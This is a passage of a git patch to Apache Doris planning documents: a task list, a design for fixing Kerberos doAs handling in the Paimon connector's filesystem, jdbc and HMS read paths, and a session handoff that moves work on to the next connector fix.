`JdbcResource.getFullDriverUrl` 的**简化子集**——只做 scheme 解析(裸名→`file://{jdbc_drivers_dir}/{name}`),**不**做文件存在性 / legacy 旧 `jdbc_drivers/` 回退 / 云下载。常见情形(`mysql.jar`+默认 dir)两者等价;仅装旧 dir 的 jar 会 BE 找不到(pre-existing 简化、FE 注册路本就如此、复用未改)。② **BE-side `paimon.jdbc.{user,password,uri}` 别名丢弃不修**——同 `startsWith("jdbc.")` filter 也丢这些别名键,但 **BE 不需要**:`PaimonJniScanner.initTable` 从 `serialized_table` 反序列化整表、**不**从 options_json 重建 JdbcCatalog;BE 唯一消费 jdbc 选项处 `PaimonJdbcDriverUtils.registerDriverIfNeeded` 只读 driver_url/driver_class。legacy `getBackendPaimonOptions` 亦仅发 driver_url+driver_class(窄)。故 B-8a 只修 driver_url/class 即 parity(scope-critic lens LGTM 确认) | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(surgical scope-out,BE 经 trace 确认安全)| diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index ad5c6d9ba86958..3f9ef2ab2f00b7 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -28,12 +28,13 @@ | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | -| 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 14/0/0 | ⬜ | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). +³ #6 SPI corrected `maybe`→**`no`** ([D-052](./decisions-log.md)/[D-053](./decisions-log.md)): M-11 is connector-only (wraps existing `ConnectorContext.executeAuthenticated`, full legacy parity per signed [D-052], superseding the D7=B read-path clause). M-8 adds an **internal fe-core hook** `MetastoreProperties.initExecutionAuthenticator(List)` (default no-op, wired in `PluginDrivenExternalCatalog`) — **not** connector SPI (`ConnectorContext`/`Connector` surface unchanged), so 01-spi-extensions-rfc.md is not touched. Scope = filesystem+jdbc only (DLF/REST/HMS excluded, "DLF" clause overstated). True end-to-end doAs is live-Kerberos-e2e only ([DV-031](./deviations-log.md)). ² #4 SPI corrected `maybe`→**`no`** ([D-050](./decisions-log.md)): the fix reuses the **existing** `Connector.preCreateValidation` + `ConnectorValidationContext.validateAndResolveDriverPath` hooks (B-8b) and the existing `paimon.options_json` transport (B-8a) — **zero new SPI surface**, connector-only. Scope = CREATE-time validation parity with the JDBC reference connector; the FE-restart/ALTER/scan-time re-validation gap (pre-existing fe-core, all plugin connectors) is accepted ([DV-028](./deviations-log.md)) + filed as a cross-connector follow-up. BE-side `paimon.jdbc.{user,password,uri}` alias-drop out of scope ([DV-029](./deviations-log.md), BE deserializes the table from `serialized_table`, doesn't rebuild a JdbcCatalog from these). ¹ #3 SPI corrected `yes`→**`no`**: user signed **Design C** ([D-049](./decisions-log.md)) — the connector builds the thrift `TSchema` dict directly from paimon (BE only needs field `id`/`name`/nesting-tag, no Doris `Type`), reusing the existing `populateScanLevelParams` hook → **zero new SPI surface**. M-10 deferred ([DV-026](./deviations-log.md)); eager all-schemas read accepted ([DV-027](./deviations-log.md)). Legend: ⬜ todo / 🔄 in progress / ✅ done diff --git a/plan-doc/tasks/designs/P5-fix-KERBEROS-DOAS-design.md b/plan-doc/tasks/designs/P5-fix-KERBEROS-DOAS-design.md new file mode 100644 index 00000000000000..2d8570e5817bbd --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-KERBEROS-DOAS-design.md @@ -0,0 +1,131 @@ +# P5 fix design — `FIX-KERBEROS-DOAS` (rereview2 #6 = M-8 + M-11) + +> Source findings: `plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md` (M-8, M-11; both 3/3 confirmed). +> Re-verified against **current** code (5-agent recon workflow `wf_2f6cdf48-cd6` + independent reads). +> User scope decisions (this session): **M-11 = full legacy parity** (wrap all reads), **M-8 = fix now in fe-core**. + +--- + +## Problem + +On **Kerberos-secured** deployments the cutover (plugin) paimon catalog loses the UGI `doAs` that legacy applied. Two distinct gaps, same `ExecutionAuthenticator` mechanism: + +- **M-8** — `filesystem`/`jdbc` flavor catalogs over **Kerberized HDFS** run *every* op (catalog create + reads) with NO real `doAs`. `PaimonConnector` correctly wraps catalog-create in `context.executeAuthenticated` (`PaimonConnector.java:194`), but the authenticator behind it is the **base no-op** for these two flavors, so the wrap is inert. +- **M-11** — On a **Kerberos HMS** catalog, the connector's metadata **read** RPCs (`getTable`, `listTables`, `listDatabases`, `getDatabase`, `listPartitions`) run with NO `executeAuthenticated` wrap. The 4 DDL ops ARE wrapped (deliberate signed **D7=B** read-vs-DDL asymmetry). Legacy wrapped **all** reads per-call. + +Both are **Kerberos-only**: on simple-auth the no-op authenticator is behaviorally identical to a real one (`ExecutionAuthenticator.execute` = `task.call()`), so non-secured deployments are unaffected. + +**Out of scope (verified):** DLF (the review's "DLF" clause is **overstated** — `PaimonAliyunDLFMetaStoreProperties` never sets an authenticator and authenticates via Aliyun AK/SK/STS into HiveConf, not Kerberos UGI; OSS/OSS_HDFS-backed; there is no `doAs` to lose). HMS for M-8 (already correct). REST (no Kerberos). + +## Root Cause + +### M-8 (authenticator no-op on cutover path) +- `AbstractPaimonProperties.java:44-46` declares `@Getter protected ExecutionAuthenticator executionAuthenticator = new ExecutionAuthenticator(){}` — a **no-op default** that shadows `MetastoreProperties.getExecutionAuthenticator()` (returns `NOOP_AUTH`, `MetastoreProperties.java:139`). +- **HMS** assigns the real `HadoopExecutionAuthenticator` in `initNormalizeAndCheckProps()` (`PaimonHMSMetaStoreProperties.java:70`), which `AbstractMetastorePropertiesFactory.createInternal:71` calls **unconditionally** at `MetastoreProperties.create()` → live authenticator → unaffected. +- **filesystem** (`PaimonFileSystemMetaStoreProperties.java:46`) and **jdbc** (`PaimonJdbcMetaStoreProperties.java:120`) assign it **only inside `initializeCatalog()`**. +- `initializeCatalog()` is **dead on the cutover path**: its only live caller is legacy `PaimonExternalCatalog.java:147`. The plugin catalog builds its own paimon `Catalog` via `PaimonCatalogFactory` (`PaimonConnector.createCatalog`), never calling `initializeCatalog`. +- So `PluginDrivenExternalCatalog.initPreExecutionAuthenticator()` reads `msp.getExecutionAuthenticator()` (`:130`) → the line-45 no-op → supplied to the connector via `DefaultConnectorContext(this::getExecutionAuthenticator)` (`:150`). `executeAuthenticated` then runs `task.call()` with **no `doAs`**. +- Legacy "worked" only because `createCatalog()`→`initializeCatalog(storageList)` ran **before** `initPreExecutionAuthenticator()`, mutating the field to the real authenticator first. + +### M-11 (read-path RPCs unwrapped) +- `PaimonConnectorMetadata` wraps the 4 DDL ops in `context.executeAuthenticated` (`:687/712/754/783`) but issues the read RPCs bare. Legacy `PaimonMetadataOps` / `PaimonExternalCatalog` wrapped **every** read in `executionAuthenticator.execute` (`getPaimonPartitions:99` listPartitions, `getPaimonTable:137` getTable, plus listDatabases/listTables/getDatabase). +- This was a **deliberate signed decision** (B3 D7=B: wrap DDL, defer read-path wrap to the live-e2e gate). M-11 re-opens it. **User signed full legacy parity this session → new decision `[D-052]` supersedes D7=B's read-path clause.** + +## Design + +### M-8 — fe-core, mirror HMS, reuse the safely-created storage list (filesystem + jdbc only) + +Wire the HDFS authenticator at **catalog-init time** (matching legacy timing — important because `KerberosHadoopAuthenticator`'s ctor logs in **eagerly** and throws on failure; we must NOT move that to every `MetastoreProperties.create()`/`checkProperties`). Reuse the already-safely-created `catalogProperty.getOrderedStoragePropertiesList()` (the exact list legacy passed to `initializeCatalog`) rather than rebuilding via `StorageProperties.createAll` (which would re-run + re-login on each call and add throw-risk legacy didn't have). + +New generic hook on the metastore base, default no-op, called once on the plugin-catalog init path: + +1. `MetastoreProperties.java` — add + ```java + public void initExecutionAuthenticator(List storagePropertiesList) { + // default no-op; subtypes whose ExecutionAuthenticator is derived from the catalog's + // storage properties (paimon filesystem/jdbc over kerberized HDFS) override this. + } + ``` +2. `AbstractPaimonProperties.java` — add a shared helper: + ```java + protected void initHdfsExecutionAuthenticator(List storagePropertiesList) { + if (storagePropertiesList == null) { + return; + } + for (StorageProperties sp : storagePropertiesList) { + if (sp.getType() == StorageProperties.Type.HDFS) { + this.executionAuthenticator = new HadoopExecutionAuthenticator( + ((HdfsProperties) sp).getHadoopAuthenticator()); + return; + } + } + } + ``` +3. `PaimonFileSystemMetaStoreProperties.java` + `PaimonJdbcMetaStoreProperties.java` — override: + ```java + @Override + public void initExecutionAuthenticator(List storagePropertiesList) { + initHdfsExecutionAuthenticator(storagePropertiesList); + } + ``` + (Legacy `initializeCatalog` left untouched — still serves the legacy path until B8 deletes it; the 3-line overlap is acceptable and avoids risk to the live legacy path.) +4. `PluginDrivenExternalCatalog.initPreExecutionAuthenticator()` — call the hook **before** reading the authenticator: + ```java + MetastoreProperties msp = catalogProperty.getMetastoreProperties(); + if (msp != null) { + msp.initExecutionAuthenticator(catalogProperty.getOrderedStoragePropertiesList()); // NEW + executionAuthenticator = msp.getExecutionAuthenticator(); + return; + } + ``` + Generic + safe: non-paimon msp and paimon hms/dlf/rest get the base no-op (HMS already real). No connector change (impossible — connector can't import fe-core; it already wraps create in `executeAuthenticated`). + +### M-11 — connector, wrap all read RPCs, catch domain exceptions INSIDE the lambda + +**Exception-flow constraint (load-bearing):** under Kerberos, `UGI.doAs` wraps a thrown checked `Catalog.{Table,Database}NotExistException` in `UndeclaredThrowableException` (only `IOException`/`RuntimeException`/`Error`/`InterruptedException` pass through — `SimpleHadoopAuthenticator.doAs:57`, `KerberosHadoopAuthenticator.doAs:111`). So catching the domain exception **outside** `executeAuthenticated` breaks under Kerberos. Mirror legacy: catch the domain exception **inside** the lambda (legacy `getPaimonPartitions:104` did exactly this), or — where the existing catch is already a catch-all `Exception` → wrap-as-RuntimeException — keep it outside (the catch-all absorbs the wrapped exception unchanged). + +Seven read sites (`context` is available in both classes): + +| # | site | RPC | wrap shape | +|---|------|-----|-----------| +| 1 | `PaimonConnectorMetadata.listDatabaseNames:96` | listDatabases | wrap call; existing outer `catch(Exception)→empty` absorbs it (no domain exception thrown) | +| 2 | `databaseExists:106` | getDatabase | catch `DatabaseNotExistException` **inside** → return false; outer `catch(Exception)`→ rethrow `DorisConnectorException` (preserve "propagate" for other failures) | +| 3 | `listTableNames:116` | listTables | catch `DatabaseNotExistException` **inside** → empty(+log); outer `catch(Exception)`→ empty(+log) | +| 4 | `getTableHandle:131` | getTable | catch `TableNotExistException` **inside** → `Optional.empty()`; outer `catch(Exception)`→ empty(+log) | +| 5 | `getSysTableHandle:292` | getTable(sysId) | catch `TableNotExistException` **inside** → null sentinel → `Optional.empty()` | +| 6 | `resolveTable:987` **and** `PaimonScanPlanProvider.resolveTable:187` | getTable reload (via `PaimonTableResolver.resolve`) | wrap the whole `resolve(...)` call; existing `catch(Exception)→RuntimeException` absorbs the wrapped exception. **DRY win** — covers every `resolveTable` caller (getTableSchema, getColumnHandles, collectPartitions, fetchRowCount's table-load, scan planScan, branch resolution, …) | +| 7 | `collectPartitions:894` | listPartitions | catch `TableNotExistException` **inside** → empty(+log); outer `catch(Exception)`→ RuntimeException (exact legacy `getPaimonPartitions` shape) | + +**Do NOT wrap** snapshot/schema/`rowCount`/`planScan`/`getSplits` (FileIO reads, not HMS RPCs — legacy did not wrap `fetchRowCount`/split planning either; wrapping them is not a parity regression but is out of scope). The transient-`Table` fast path in `resolve` (no RPC) under `doAs` is harmless (cheap thread-local UGI swap, once per op). + +## Implementation Plan + +**fe-core (M-8) — 5 files:** `MetastoreProperties.java` (+ hook + import `StorageProperties`), `AbstractPaimonProperties.java` (+ helper + imports `HdfsProperties`/`HadoopExecutionAuthenticator`/`List`), `PaimonFileSystemMetaStoreProperties.java` (+ override), `PaimonJdbcMetaStoreProperties.java` (+ override), `PluginDrivenExternalCatalog.java` (1 line). + +**connector (M-11) — 2 files:** `PaimonConnectorMetadata.java` (7 edits: sites 1–5,6,7), `PaimonScanPlanProvider.java` (1 edit: site 6 scan twin). + +Connector import gate stays clean (`context.executeAuthenticated` is SPI; no fe-core import). One commit (#6), three sides (connector + fe-core; no SPI surface change — `executeAuthenticated`/`getExecutionAuthenticator` already exist). + +## Risk Analysis + +- **M-8 eager Kerberos login at catalog-init**: matches legacy timing (`initializeCatalog` also logged in eagerly). Building from the pre-created storage list avoids repeated logins. Non-kerberos/non-HDFS catalogs: helper finds no HDFS storage → stays no-op → no behavior change. +- **M-8 generic base hook**: default no-op → MaxCompute/jdbc/es and paimon hms/dlf/rest unaffected. `getOrderedStoragePropertiesList()` is already exercised on the same init path → no new throw surface. +- **M-11 exception semantics**: the inside-lambda catches preserve each site's exact today behavior on simple-auth AND make it correct on Kerberos. Sites 1/6 keep their existing catch-all outside (absorbs wrapped exceptions). Risk: site 2 `databaseExists` gains an outer `catch(Exception)→DorisConnectorException` it didn't have — but it previously let such failures propagate as unchecked anyway (fail-loud preserved). +- **Perf**: one `executeAuthenticated` frame per metadata op (not per-split). Negligible; legacy paid the same per-call `execute()`. + +## Test Plan + +### Unit Tests (runnable FE) +- **M-11** (`fe-connector-paimon`): new test(s) using `RecordingConnectorContext` (`authCount`/`failAuth`) + `RecordingPaimonCatalogOps` (logs `listPartitions:`/`getTable:` etc.), copying `PaimonConnectorMetadataDdlTest.createTableRunsSeamInsideAuthenticator`: + - `failAuth=true` → `listPartitionNames`/`getTableHandle`/`listTableNames`/`databaseExists`/`getTableSchema`(resolveTable) each throw/return-without-reaching-the-seam, and the catalogOps log has **no** corresponding read entry (proves the seam is INSIDE the authenticator); `authCount` incremented. + - **fail-before**: revert one wrap → the seam runs despite `failAuth` (log shows the read) → test goes red. +- **M-8** (`fe-core`): extend `PaimonFileSystemMetaStorePropertiesTest` (+ new `PaimonJdbcMetaStorePropertiesTest` if absent): assert `getExecutionAuthenticator()` returns `HadoopExecutionAuthenticator` after `initExecutionAuthenticator(StorageProperties.createAll(props))` **without** calling `initializeCatalog()`, for a non-kerberos HDFS (`file://`) config (no live KDC needed). **fail-before**: with the override removed, `getExecutionAuthenticator()` stays the base no-op → assert goes red. + +### E2E (CI-gated, NOT run here) +- True end-to-end `doAs` (Kerberos HMS read RPCs + Kerberized-HDFS filesystem/jdbc) is **live-Kerberos-e2e only**; **no paimon-kerberos regression suite exists** (the 4 suites under `regression-test/.../kerberos/` cover hive+iceberg, gated by `enableKerberosTest`). Note as gated; do not claim it ran. + +## Decisions / deviations to log +- `[D-052]` — wrap **all** connector metastore reads in `executeAuthenticated` (full legacy parity), superseding the **D7=B** read-path clause (user-signed this session). Update the B3 design note. +- `[D-053]` — M-8 fixed in fe-core for **filesystem+jdbc** only; DLF/HMS/REST excluded (verified). "DLF" clause in the review marked overstated. +- No SPI surface change (RFC unchanged): `ConnectorContext.executeAuthenticated` + `MetastoreProperties.getExecutionAuthenticator` already exist; `MetastoreProperties.initExecutionAuthenticator` is an internal fe-core hook, not connector SPI. +- Cross-connector follow-up: the read-vs-DDL `doAs` gap recurs in hudi/iceberg full-adopters (`cutover-fe-dispatch-gap` sibling) — note alongside `[DV-030]`. From 68629e0579cb9ab61faaf0a54e77c0753bd7703a Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 23:30:04 +0800 Subject: [PATCH 025/128] docs: checkpoint #6 FIX-KERBEROS-DOAS done; hand off #7 FIX-FORCE-JNI-SCANNER #6 fix commit = 2b1442fa57a. Fill task-list commit cell; roll HANDOFF to #7. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 66 ++++++++++++------------ plan-doc/task-list-P5-rereview2-fixes.md | 2 +- 2 files changed, 34 insertions(+), 34 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index b948701949e318..0483c56d842fcc 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,35 +5,35 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#5 已完成 → 从 #6 起)** +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#6 已完成 → 从 #7 起)** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 -## ✅ 已完成(P0 BLOCKER 全清 + P1 #5) +## ✅ 已完成(P0 BLOCKER 全清 + P1 #5、#6) - **#1 `FIX-URI-NORMALIZE`**(B-7DF/DV)`20b19d19dd8` —— native 数据文件 + DV 路径 scheme 归一化。新 SPI `ConnectorContext.normalizeStorageUri`。 - **#2 `FIX-STATIC-CREDS-BE`**(B-9)`d23d5df9914` —— 静态 object-store 凭据→BE canonical `AWS_*`。新 SPI `ConnectorContext.getBackendStorageProperties`。 - **#3 `FIX-SCHEMA-EVOLUTION`**(B-1a;M-10 deferred)`667f779af04` —— 连接器直建 thrift schema 字典(Design C,零新 SPI)。 - **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7` —— driver_url resolve+别名+CREATE-time 校验(纯连接器,零新 SPI;[D-050]/[DV-028]/[DV-029])。 -- **#5 `FIX-MAPPING-FLAG-KEYS`**(M-crit;本 session)`9dcf6d1a9e5` —— 见下。 - -### #5 摘要(本 session)`FIX-MAPPING-FLAG-KEYS` —— commit `9dcf6d1a9e5` -- **根因**:翻闸后 paimon 连接器类型映射两开关**静默失效**——连接器读**下划线**键 `enable_mapping_binary_as_varbinary`/`enable_mapping_timestamp_tz`(`PaimonConnectorProperties:39,42`→`PaimonConnectorMetadata.buildTypeMappingOptions`),但 fe-core 只写**点分** catalog 键 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz`(`CatalogProperty:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306` 仅写点分;`HIDDEN_PROPERTIES` 仅藏点分),`createConnectorFromProperties` 把**原始** catalog map 原样喂连接器 → `getOrDefault(下划线,"false")` 恒 false → 用户即便开启,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(legacy `PaimonExternalTable:350` 读点分 honor → cutover 回归,flag 启用前 latent)。binary 键**双重漂移**(分隔符+token `varbinary`→`binary_as_varbinary`),通用归一化器修不了。 -- **复核(M-crit 未过 3-lens → 动手前先独立复核,已做)**:5-agent scout + 对抗 synthesizer(workflow `wf_a3626c54-0db`)→ **REAL_BUG high-conf**,false-positive steelman 被否(原始 feature PR #57821/#59720、全 regression CREATE CATALOG 皆点分、legacy parity、同 SPI PR 的 JDBC 连接器正确保点分均证点分为 canonical)。 -- **修(纯连接器、零 SPI、无 BE)**:`PaimonConnectorProperties` 两常量重指 canonical 点分键(binary 常量并改名 `ENABLE_MAPPING_VARBINARY` 对齐 CatalogProperty/JDBC/iceberg;同修分隔符+token)+ 更新 `PaimonConnectorMetadata` 一处引用;`Options(mapBinaryToVarbinary,mapTimestampTz)` 顺序本就对、无逻辑改。**BE 一致性已核**:`PluginDrivenScanNode extends FileQueryScanNode` 不 override mapping getter → BE scan param 经继承的 `getEnableMappingVarbinary/Tz` 本就读点分(`FileQueryScanNode:192-193,635-678`),修后 FE 列型与 BE scan param 一致(修前两侧分歧)。否决 fe-core 归一化器(blast 大/破 JDBC/对双重漂移不足)。 -- **作用域 = paimon-only(用户签 [D-051])**:⚠️ **新 hive + iceberg 连接器同根因**(读下划线、fe-core 只写点分)——本轮不修,登 [DV-030] 跨连接器 follow-up(iceberg `enable_mapping_varbinary` 仅分隔符差;hive `enable_mapping_binary_as_string` 是**误名非语义反转**,`HmsTypeMapping:90-93` true→VARBINARY,**勿**反转 boolean)。 -- **验证**:模块 **234/0/0**(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before bug-catcher 向红**(期望 `` 实得 ``)+ guard 两态绿。e2e `test_paimon_catalog_{varbinary,timestamp_tz}.groovy` **CI-gated(未跑)**(`enablePaimonTest=false` + 外部 fixture;`.out` 期望 `timestamptz(3)`)。设计 [`P5-fix-MAPPING-FLAG-KEYS-design.md`](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md)、[D-051]、[DV-030]、无 SPI 改(RFC 无须改)。 - -## 🔜 下一个 session:从 **#6 `FIX-KERBEROS-DOAS`** 起,按 task-list 顺序续修 -> ⚠️ **先拿当前代码复核 finding**(review 只读,行号可能漂移;#3/#4/#5 改过 `PaimonScanPlanProvider`/`PaimonConnector`/`PaimonConnectorProperties`/`PaimonConnectorMetadata`,但 #6 主要在 `PaimonConnector`/`PaimonCatalogOps`/`PluginDrivenExternalCatalog`)。 -> ⚠️ **两处需用户定 scope**(动手前问):① **D7=B 读-vs-DDL 不对称**——round-1 D7 故意只在 4 个 DDL op 包 `executeAuthenticated`、read 路径不包;M-11 要求把 partition-listing **read** RPC 也包 `doAs`——**确认是否要把 read 也包**(改变 D7 的故意不对称)。② **M-8 的「DLF」从句 review 自认 overstated**(DLF 继承 no-op authenticator)——**先核实**再决定范围。 - -**#6 `FIX-KERBEROS-DOAS`(M-8 + M-11,MAJOR,secured HMS/HDFS 部署;SPI=maybe)**: -- **M-8**:Kerberized HDFS 上 filesystem/jdbc flavor 的 fs/jdbc op 丢 `doAs`(`initializeCatalog` 在翻闸路径 dead;HMS flavor 不受影响)。 -- **M-11**:MTMV / SHOW PARTITIONS / partitions-TVF 的分区枚举在 Kerberos HMS 上跑 `listPartitions` RPC **不包** `doAs`。 -- **连接器**:`PaimonConnector.java:124-196`(M-8);`PaimonCatalogOps.java:249-251`、`PaimonConnectorMetadata.java:892-894`(M-11)。**fe-core**:`PluginDrivenExternalCatalog.java:122-137,150`;`PluginDrivenMvccExternalTable.java:157`;`PluginDrivenExternalTable.java:317-318`。 -- **legacy parity**:`PaimonFileSystemMetaStoreProperties.java:40-57`、`PaimonJdbcMetaStoreProperties.java:111-135`(M-8);`PaimonExternalCatalog.java:96-118`(`executionAuthenticator.execute` wrap)、`metacache/paimon/PaimonPartitionInfoLoader.java:49`(M-11)。 -- **Fix sketch**:把 fs/jdbc HDFS authenticator 接到 live(连接器)create 路径;分区枚举 read RPC 包 `executeAuthenticated`。Scope = secured HMS/HDFS 部署。真值闸=live Kerberos e2e(CI-gated)。 +- **#5 `FIX-MAPPING-FLAG-KEYS`**(M-crit)`9dcf6d1a9e5` —— 连接器读 canonical 点分 mapping-flag 键(纯连接器,零 SPI;paimon-only,hive/iceberg 登 [DV-030])。 +- **#6 `FIX-KERBEROS-DOAS`**(M-8 + M-11;本 session)`2b1442fa57a` —— 见下。 + +### #6 摘要(本 session)`FIX-KERBEROS-DOAS` —— commit `2b1442fa57a` +- **两半,均 Kerberos-only**(simple-auth 上 no-op authenticator 与真 authenticator 行为一致、无回归): + - **M-8(fe-core,filesystem+jdbc)**:翻闸后这两 flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog:194` 已把建 catalog 包进 `executeAuthenticated`,但其背后 authenticator 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()`(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`) 内建,而该方法在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` no-op。HMS 不受影响(`initNormalizeAndCheckProps:70` 即建,必跑)。**DLF/REST 排除**(DLF 用 Aliyun STS 非 Kerberos UGI、无 doAs 可丢;review「DLF」从句 **overstated**,已核)。 + - **M-11(连接器)**:metadata **读** RPC(listDatabases/getDatabase/listTables/getTable[getTableHandle+getSysTableHandle+resolveTable]/listPartitions)**不**包 `executeAuthenticated`,仅 4 DDL op 包(B3 **D7=B** 故意 read-vs-DDL 不对称)→ Kerberos HMS 上读跑在 catalog principal 之外。 +- **用户签字(本 session 两决策)**:**M-11 = full legacy parity 包全部 read RPC**([D-052],**取代 D7=B 的 read 从句**;legacy 本就包每个 read,仅包 listPartitions 是半吊子);**M-8 = fix-now fe-core,filesystem+jdbc only**([D-053])。 +- **修**:M-8 = 新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用已安全建好的 `getOrderedStoragePropertiesList()` 调;filesystem/jdbc override 经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 建 HDFS authenticator(镜像 HMS)——**零连接器改、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改,RFC 无须改)。M-11 = 7 处 read site 包 `context.executeAuthenticated`,`resolveTable`(metadata+scan 双 site)一处覆盖所有调用方(DRY)。**异常流关键**:Kerberos `UGI.doAs` 把 checked `Catalog.{Table,Database}NotExistException` 包成 `UndeclaredThrowableException`(仅 IOException/RuntimeException/Error 透传)→ domain 异常**必须在 lambda 内**捕获(镜像 legacy `getPaimonPartitions:104`);scan `resolveTable` 对 `context==null`(2-arg ctor 离线测)走直连,同 `getScanNodeProperties` 既有约定。 +- **验证**:连接器模块 **248/0/0**(1 CI-gated skip)、fe-core metastore-props **21/0/0**(含 DLF/HMS regression-clean)、checkstyle 0、import-gate 净;**fail-before 双向红**(M-8 留 no-op `AbstractPaimonProperties$1`;M-11 3 测 authCount/log-empty 向红)。**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos 套件,[DV-031])。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md)。 + +## 🔜 下一个 session:从 **#7 `FIX-FORCE-JNI-SCANNER`** 起,按 task-list 顺序续修 +> ⚠️ **先拿当前代码复核 finding**(review 只读,行号可能漂移;#6 改过 `PaimonConnectorMetadata`/`PaimonScanPlanProvider`/`PaimonScanPlanProviderTest`,#3/#4/#5 亦改过 scan provider)。 + +**#7 `FIX-FORCE-JNI-SCANNER`(M-1,MAJOR,纯连接器,no SPI)**: +- **根因**:连接器只读 `paimonHandle.isForceJni()`(binlog/audit_log 的 NAME-forced 标志),**从不**读 session var `force_jni_scanner`;ORC/Parquet 永远走 native。JNI 逃生舱(用于绕开 native-reader bug,含 B2 schema-evolution 那类)丢失。 +- **连接器**:`PaimonScanPlanProvider.java:261,439-441`(`shouldUseNativeReader`)。**legacy**:`source/PaimonScanNode.java:361,430`(`sessionVariable.isForceJniScanner()` gate)。 +- **Fix sketch**:从 session-properties map 读 `force_jni_scanner`(该 var 已在 map 里——连接器读 sibling `enable_paimon_cpp_reader` 即出自此),set 时把所有 data split 路由到 JNI。纯连接器、无 SPI、无 BE。真值闸=live e2e(CI-gated)。 +- ⚠️ **scope 无须问用户**(明确 MAJOR、纯连接器、无歧义);直接按 per-fix 流程修。 每条遵循项目既定 per-fix 流程(`step-by-step-fix` skill):1) 设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`;2) **先拿当前代码复核 finding**;3) 实现(minimal、surgical、**连接器禁 import fe-core**);4) build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、加 fail-before/pass-after UT);5) **独立 commit**;6) SPI 改动登 `01-spi-extensions-rfc.md`、用户签字入 `decisions-log.md`、偏差入 `deviations-log.md`、同步 task-list。 @@ -42,35 +42,35 @@ | 层 | 条目 | 说明 | |---|---|---| | **P0 BLOCKER(挡 commit)** | ✅1.URI-NORMALIZE · ✅2.STATIC-CREDS-BE · ✅3.SCHEMA-EVOLUTION · ✅4.JDBC-DRIVER-URL | **全清** | -| **P1 MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · **⬜6.`FIX-KERBEROS-DOAS`(M-8+M-11)** · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | #5 已修(paimon-only,hive/iceberg 同根因登 [DV-030]);#6 两处需先定 scope(D7 读-vs-DDL 不对称 + M-8「DLF」从句 overstated)。 | +| **P1 